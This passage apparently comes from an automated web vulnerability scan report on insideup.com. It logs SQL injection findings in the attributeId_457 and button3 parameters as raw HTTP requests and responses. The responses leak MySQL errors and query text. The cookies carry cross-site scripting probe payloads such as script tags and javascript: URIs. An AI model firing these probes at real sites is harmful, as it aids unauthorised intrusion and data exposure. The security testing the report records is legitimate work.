OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v402hk8gkv6heogs4ahcpgdg56; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.291. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_457 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_457 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_457 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=11287b4l394htd5eb27a8jb4o7; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bsthasl0thg9qdbj6ccgsg37b3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.292. http://www.insideup.com/ppc/leadflow/fist00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dk5eg05g24s0qmv09u8sg3qet2; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
